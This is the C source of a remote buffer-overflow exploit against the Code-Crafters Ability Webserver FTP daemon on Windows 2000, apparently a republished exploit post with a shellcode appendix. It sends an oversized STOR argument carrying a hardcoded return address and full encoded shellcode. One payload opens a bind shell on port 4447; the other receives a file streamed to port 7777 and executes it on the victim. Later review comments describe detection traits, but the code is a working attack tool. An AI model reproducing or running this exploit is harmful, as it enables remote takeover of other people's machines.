文章作者:oxff[!!at!!]pixel-house.net
/*
*
* 'Code-Crafters Ability Webserver' FTPd Exploit
* Written by OxFF <oxff[!!at!!]pixel-house.net> from IngleWood
*
* Dedicated to all those IngleWood people, you know you rock!
*
* Do me a favour and stop trolling on Full-Disclosure Mailing list.
*
*/
#include <winsock.h>
#include <stdio.h>
#include "shellcode.h"
#define COMPILE_STANDALONE
// inside mfc dll on win2k sp4
// if you find universal address, _CONTACT ME_
#define EIP 0x6C2E9623
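inline int GetFtpCode(SOCKET sckConn, char * szBuffer, unsigned int nBuffSize)
{
    // Reads one FTP reply into szBuffer and returns its leading numeric
    // status code (via atoi), or 0 when the socket is closed / fails or the
    // buffer is too small to hold even one byte plus a terminator. Any
    // further data already queued on the socket is drained and discarded so
    // the next call starts on a fresh reply.
    //
    // Fix versus the original: recv() filled the whole buffer and the drain
    // loop then wrote szBuffer[iRead] with iRead == nBuffSize, one byte past
    // the end; the first reply was also handed to atoi() unterminated. Both
    // reads now leave room for the NUL that is written afterwards.
    if(nBuffSize < 2)
        return 0;

    int iRead = recv(sckConn, szBuffer, nBuffSize - 1, 0);
    if(iRead <= 0)
        return 0;
    szBuffer[iRead] = 0;            // recv() does not terminate; atoi() needs it
    int iCode = atoi(szBuffer);

    while(true)
    { // empty queue
        TIMEVAL tvTimeOut = { 0, 500 }; // 0 s + 500 us: a very short poll, not 500 ms
        fd_set fdSet;
        FD_ZERO(&fdSet);
        FD_SET(sckConn, &fdSet);
        // Winsock ignores the nfds argument, so 1 is fine here. A failed or
        // timed-out select() ends the drain instead of trusting FD_ISSET on an
        // fd_set that select() may not have updated.
        if(select(1, &fdSet, 0, 0, &tvTimeOut) <= 0)
            break;
        if(!FD_ISSET(sckConn, &fdSet))
            break;
        iRead = recv(sckConn, szBuffer, nBuffSize - 1, 0);
        if(iRead <= 0)
            break;
        szBuffer[iRead] = 0;        // keep the tail terminated for callers that inspect it
    }
    return iCode;
}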
inline bool SendFtpCommand(SOCKET sckConn, const char * szBuffer)
{
    // Writes one complete command line (the caller supplies the CRLF) and
    // reports whether send() accepted every byte of it. A failed send()
    // returns -1, which can never equal a real length, so it reads as false.
    const size_t nWanted = strlen(szBuffer);
    const int iSent = send(sckConn, szBuffer, nWanted, 0);
    return iSent >= 0 && (size_t) iSent == nWanted;
}
bool Exploit(unsigned long ulTargetHost, int iType)
{
// Runs one anonymous FTP session against ulTargetHost:21 and sends a single
// oversized STOR argument built as: 964 filler bytes, the 4-byte EIP constant
// from the top of the file, 32 more filler bytes, one of the two payload
// arrays (iType == 0 -> bindcode, otherwise uploadcode) and CRLF -- roughly
// 1.4 KB in total. Returns false on any socket error or unexpected reply
// code; true only means the request was fully written, nothing is read back.
//
// Observability: the whole exchange is plaintext. An anonymous login followed
// by a STOR whose argument is ~1.4 KB and contains non-printable bytes is what
// a command-logging FTP server or a length-based IDS rule would record.
SOCKET sckSocket;
char szBuffer[2048]; // shared reply/request buffer; the largest request built below fits with room to spare
{ // connect
SOCKADDR_IN addrTarget;
addrTarget.sin_family = AF_INET;
addrTarget.sin_addr.s_addr = ulTargetHost; // caller passes the raw h_addr bytes, so no htonl() here
addrTarget.sin_port = htons(21);
if((sckSocket = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return false;
if(connect(sckSocket, (SOCKADDR * ) &addrTarget, sizeof(addrTarget)) == SOCKET_ERROR)
return false; // NOTE(review): sckSocket is leaked here and on every early return below (no closesocket)
}
{ // login
// Reply codes checked are the RFC 959 values: 220 greeting, 331 need
// password, 230 logged in, 227 entering passive mode. The 227 reply is only
// checked, never parsed -- no data connection is ever opened, the STOR
// line below is sent on the control channel regardless.
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 220)
return false;
// strncpy plus a manual terminator is redundant for these short literals but harmless
strncpy(szBuffer, "USER anonymous\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 331)
return false;
strncpy(szBuffer, "PASS anonymous@\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 230)
return false;
strncpy(szBuffer, "PASV\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 227)
return false;
}
{ // build trigger, append shellcode and send to victim
unsigned int nLength;
memcpy(szBuffer, "STOR ", 5);
memset(&szBuffer[5], 'A', 964); // fixed-length filler; the EIP constant is written directly after it
nLength = 5 + 964;
// Type-punned, possibly misaligned 4-byte store into a char array; a
// memcpy() of the constant would be the portable form. EIP is the
// Win2K SP4 MFC address defined at the top and is the only
// target-version-specific value in the file.
* ((unsigned long *) &szBuffer[nLength]) = EIP;
nLength += 4;
memset(&szBuffer[nLength], 'A', 32); // 32-byte pad between the address and the payload bytes
nLength += 32;
if(iType == 0)
{
memcpy(&szBuffer[nLength], bindcode, sizeof(bindcode) - 1); // -1 drops the string literal's NUL
nLength += sizeof(bindcode) - 1;
}
else
{
memcpy(&szBuffer[nLength], uploadcode, sizeof(uploadcode) - 1); // same: raw bytes only, no NUL
nLength += sizeof(uploadcode) - 1;
}
szBuffer[nLength++] = '\r';
szBuffer[nLength++] = '\n';
// send() returns int; against the unsigned nLength a -1 result becomes a
// large value, which still fails the equality test as intended.
if(send(sckSocket, szBuffer, nLength, 0) != nLength)
return false;
}
closesocket(sckSocket);
return true;
}
#ifdef COMPILE_STANDALONE
bool StreamFile(unsigned long ulTargetHost, const char * szFile)
{
// Opens szFile and copies its contents, 1024 bytes at a time, over a fresh TCP
// connection to ulTargetHost:7777. Returns false if the file cannot be opened,
// the socket cannot be created or connected, or a send() reports <= 0.
SOCKADDR_IN addrRemote;
SOCKET sckSocket;
FILE * pFile;
char szBuffer[1024];
addrRemote.sin_family = AF_INET;
addrRemote.sin_addr.s_addr = ulTargetHost; // raw h_addr bytes from main(), no htonl()
addrRemote.sin_port = htons(7777); // defined in shellcode
if(!(pFile = fopen(szFile, "rb")))
return false;
if((sckSocket = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
fclose(pFile);
return false;
}
if(connect(sckSocket, (SOCKADDR *) &addrRemote, sizeof(addrRemote)) == SOCKET_ERROR)
{
fclose(pFile); // NOTE(review): sckSocket is not closed on this path or the send() failure path below
return false;
}
// NOTE(review): feof() only becomes true after a read has hit end-of-file, so
// when the file size is an exact multiple of 1024 the loop performs one extra
// fread() that returns 0, and send() of 0 bytes returns 0, which is reported
// as failure. fread() errors and partial send()s also go unnoticed.
while(!feof(pFile))
if(send(sckSocket, szBuffer, fread(szBuffer, 1, sizeof(szBuffer), pFile), 0) <= 0)
{
fclose(pFile);
return false;
}
closesocket(sckSocket);
fclose(pFile);
return true;
}
int main(int iArgC, char * szArgV[])
{
// Command-line driver: <target-host> [file]. With a file argument iType is 1
// (uploadcode payload, then the file is streamed to port 7777 by StreamFile);
// without one iType is 0 (bindcode payload; the banner names port 4447).
// Exit status is 1 only for unusable arguments; an exploit or streaming
// failure is printed but still exits 0.
unsigned long ulTarget;
int iType;
printf("Code-Crafters Ability FTPd Remote Exploit 2.34 / Win2K SPx\t\tby OxFF\tof IngleWood\n ~ either creates bindshell on port 4447\n ~ or transmits given file to host and executes it there\n\n");
if(iArgC < 2 || iArgC > 3)
{
printf("Usage: %s <target-host> [transmit-and-execute-file]\n", szArgV[0]);
return 0;
}
if(iArgC == 3)
iType = 1;
else
iType = 0;
{
WSADATA wdData;
WSAStartup(MAKEWORD(2, 2), &wdData); // NOTE(review): result unchecked and there is no matching WSACleanup()
}
if(iType == 1)
{ // ensure file exists
// Only an open/close probe; the file is reopened in StreamFile, so it can
// still disappear or change in between.
FILE * pFile;
if(!(pFile = fopen(szArgV[2], "rb")))
{
printf("[-] could not open %s for reading\n", szArgV[2]);
return 1;
}
fclose(pFile);
}
{
HOSTENT * pHost;
if(!(pHost = gethostbyname(szArgV[1]))) // legacy IPv4-only resolver
{
printf("[-] could not resolve %s\n", szArgV[1]);
return 1;
}
// Takes the first address of h_addr_list through an unsigned long* cast:
// relies on a 4-byte unsigned long (true on Win32) and an AF_INET result.
ulTarget = * ((unsigned long *) * pHost->h_addr_list);
}
printf("[+] starting %s exploit against %s:21\n", (iType == 0 ? "bindshell" : "upload 'n' execute"), szArgV[1]);
if(!Exploit(ulTarget, iType))
printf("[-] exploit failed\n");
else
printf("[+] exploit successful\n");
if(iType == 1)
{
Sleep(1000); // presumably a fixed delay before connecting to port 7777 -- there is no readiness check
if(StreamFile(ulTarget, szArgV[2]))
printf("[+] streamed file %s to target host\n", szArgV[2]);
else
printf("[-] streaming %s failed\n", szArgV[2]);
}
return 0;
}
#endif // COMPILE_STANDALONE
补充:
/*
*
* Universal Win32 Shellcodes
* Collected and modified by OxFF <oxff[!!at!!]pixel-house.net> from IngleWood
*
* Dedicated to all those IngleWood people, you know you rock!
*
* Do me a favour and stop trolling on Full-Disclosure Mailing list.
*
*/
/* win32_bind - Encoded Shellcode [\x00] [ EXITFUNC=thread LPORT=4447 Size=399 ] http://metasploit.com */
// Raw payload bytes copied verbatim into the STOR argument by Exploit().
// sizeof(bindcode) - 1 == 399 (24 lines of 16 bytes plus a final 15), which
// matches the Size=399 stated in the header comment; the literal's
// terminating NUL is never sent. Per that header the bytes are an encoded
// form (no 0x00 bytes), so they are not the plain payload as executed.
char bindcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x12\x45"
"\xc1\xf8\x83\xeb\xfc\xe2\xf4\xee\xad\x97\xf8\x12\x45\x92\xad\x44"
"\x12\x4a\x94\x36\x5d\x4a\xbd\x2e\xce\x95\xfd\x6a\x44\x2b\x73\x58"
"\x5d\x4a\xa2\x32\x44\x2a\x1b\x20\x0c\x4a\xcc\x99\x44\x2f\xc9\xed"
"\xb9\xf0\x38\xbe\x7d\x21\x8c\x15\x84\x0e\xf5\x13\x82\x2a\x0a\x29"
"\x39\xe5\xec\x67\xa4\x4a\xa2\x36\x44\x2a\x9e\x99\x49\x8a\x73\x48"
"\x59\xc0\x13\x99\x41\x4a\xf9\xfa\xae\xc3\xc9\xd2\x1a\x9f\xa5\x49"
"\x87\xc9\xf8\x4c\x2f\xf1\xa1\x76\xce\xd8\x73\x49\x49\x4a\xa3\x0e"
"\xce\xda\x73\x49\x4d\x92\x90\x9c\x0b\xcf\x14\xed\x93\x48\x3f\x93"
"\xa9\xc1\xf9\x12\x45\x96\xae\x41\xcc\x24\x10\x35\x45\xc1\xf8\x82"
"\x44\xc1\xf8\xa4\x5c\xd9\x1f\xb6\x5c\xb1\x11\xf7\x0c\x47\xb1\xb6"
"\x5f\xb1\x3f\xb6\xe8\xef\x11\xcb\x4c\x34\x55\xd9\xa8\x3d\xc3\x45"
"\x16\xf3\xa7\x21\x77\xc1\xa3\x9f\x0e\xe1\xa9\xed\x92\x48\x27\x9b"
"\x86\x4c\x8d\x06\x2f\xc6\xa1\x43\x16\x3e\xcc\x9d\xba\x94\xfc\x4b"
"\xcc\xc5\x76\xf0\xb7\xea\xdf\x46\xba\xf6\x07\x47\x75\xf0\x38\x42"
"\x15\x91\xa8\x52\x15\x81\xa8\xed\x10\xed\x71\xd5\x74\x1a\xab\x41"
"\x2d\xc3\xf8\x03\x1a\x48\x18\x78\x55\x91\xaf\xed\x10\xe5\xab\x45"
"\xba\x94\xd0\x41\x11\x96\x07\x47\x65\x48\x3f\x7a\x06\x8c\xbc\x12"
"\xcc\x22\x7f\xe8\x74\x01\x75\x6e\x61\x6d\x92\x07\x1c\x32\x53\x95"
"\xbf\x42\x14\x46\x83\x85\xdc\x02\x01\xa7\x3f\x56\x61\xfd\xf9\x13"
"\xcc\xbd\xdc\x5a\xcc\xbd\xdc\x5e\xcc\xbd\xdc\x42\xc8\x85\xdc\x02"
"\x11\x91\xa9\x43\x14\x80\xa9\x5b\x14\x90\xab\x43\xba\xb4\xf8\x7a"
"\x37\x3f\x4b\x04\xba\x94\xfc\xed\x95\x48\x1e\xed\x30\xc1\x90\xbf"
"\x9c\xc4\x36\xed\x10\xc5\x71\xd1\x2f\x3e\x07\x24\xba\x12\x07\x67"
"\x45\xa9\x17\xdc\xa5\xa1\x07\x47\x41\xf0\x23\x41\xba\x11\xf8";
// http://www.packetstormsecurity.com/shellcode/upload-exec-shellcode.c
// modified version, if you want the source, contact me
// Second payload, selected by Exploit() when a file argument is given; the
// literal's NUL is excluded on copy. If every line below holds 17 bytes as
// the first ones do, sizeof(uploadcode) - 1 == 26 * 17 + 12 == 454.
// NOTE(review): the opening bytes read as a short jmp/pop/xor-loop decoder
// with a 0x1b0 (432) byte count, which equals 454 minus a 22-byte stub -- so
// the bytes on this page appear to be stored XOR-encoded and only unpacked at
// runtime; confirm by disassembling before relying on byte-level matching.
char uploadcode[] =
"\xEB\x0F\x58\x31\xC9\x66\xB9\xB0\x01\x80\x30\x80\x40\xE2\xFA\xEB\x05"
"\xE8\xEC\xFF\xFF\xFF\x68\xC7\x80\x80\x80\x59\x89\x75\x2D\x4B\x6D\x7C"
"\xBB\x24\x9A\xF0\x47\x24\x2D\xAE\x69\x65\xC9\x06\xC9\x36\x99\x98\x67"
"\x67\xF9\x46\xF9\xFE\x58\x62\xF3\x18\x7E\x0A\x8E\x25\x97\x80\xFC\x9F"
"\xF9\x8A\x68\x7B\x17\x7D\x8F\xD7\xD3\xB2\xDF\xB3\xB2\xAE\xC4\xCC\xCC"
"\x80\xF2\xE7\xF3\xF2\xF6\xB3\xB2\xAE\xE5\xF8\xE5\x80\xDB\xD5\x09\x65"
"\xE6\x01\x6C\xB4\x80\x09\x66\xE6\x01\x6C\x8C\x80\x68\x5B\x80\x80\x80"
"\x09\x47\xD7\xE8\x0E\xCE\x8E\x6C\x68\x67\x80\x80\x80\x09\xC5\x88\x0D"
"\xD3\xB0\xD2\x7F\xD5\x88\x09\xC5\x88\x0D\xD3\xBB\x09\xD6\xB4\xEA\x8D"
"\xD9\xE6\x01\x79\x87\x80\xF5\x83\x0B\xFD\x88\x09\x8E\xD7\x7F\xF4\x0B"
"\x7C\x68\x3B\x80\x80\x80\x0B\x8E\x09\xC4\x0E\x7C\x62\x62\xE6\x01\x6C"
"\x10\x81\xD4\xE8\x81\x81\x80\x80\x7F\xD6\x84\xB1\x7F\xD7\xD7\xD7\xD7"
"\xC7\xD7\xC7\xD7\x7F\x96\x09\x43\xB1\x7F\xD7\xD7\xE8\x82\x80\x9E\xE1"
"\x09\x62\xEA\x90\xD2\xD3\x7F\xD6\x88\xD7\xD3\x7F\xD6\x8C\xD7\xD6\xD3"
"\x7F\xD6\x90\x09\x43\xEA\x80\xEA\x86\xEA\x84\xEA\x80\xEA\x87\xE8\x80"
"\x80\x80\x60\x7F\xF6\xB4\x7F\xD6\xA4\x09\x47\x01\x6C\x1C\x7F\x7F\x7F"
"\x09\x65\x0D\xD5\xE4\xEA\x80\xE8\xE4\x80\x80\x80\xD2\xD3\x7F\xD6\x94"
"\xBD\x7F\x7F\x7F\x7F\xF4\x95\xBD\x80\x80\x80\x80\xF4\x8E\x0D\xD5\xE4"
"\xEA\x80\xD1\xD0\xD2\xD7\x7F\xD6\xA8\x6B\x55\xD7\x7F\xD6\xAC\xE8\x85"
"\x80\x80\x80\x7F\xF6\xB4\x7F\xD6\xA0\xB1\x7F\xD7\x7F\xD6\x9C\xD5\xD6"
"\xE4\x21\xB0\x80\x80\x80\x0B\xC0\x8C\x0B\xF0\x9C\x2D\x0B\xE8\x88\x09"
"\x68\xDE\xDD\x42\x84\x80\xD3\xD5\xD6\xD7\x0B\xEC\xA4\x98\x0B\xC5\xBC"
"\x0B\xD4\x85\xF8\x81\x6A\x0B\xCA\x98\x0B\xDA\xA0\x81\x6B\x63\xB5\xC9"
"\x0B\xB4\x0B\x81\x6E\xB1\x7F\x7C\xB1\x40\x2C\xB8\x60\xF4\x87\x41\x4F"
"\x8D\x81\x47\x6B\x72\xBB\xFC\xA4\x94\xF5\x61\x0B\xDA\xA4\x81\x6B\xE6"
"\x0B\x8C\xCB\x0B\xDA\x9C\x81\x6B\x0B\x84\x0B\x81\x68\x69\x82\x80\x80"
"\x80\xB1\x40\x09\x6A\xDF\xDE\xDD\xDB\x42\x84\x80";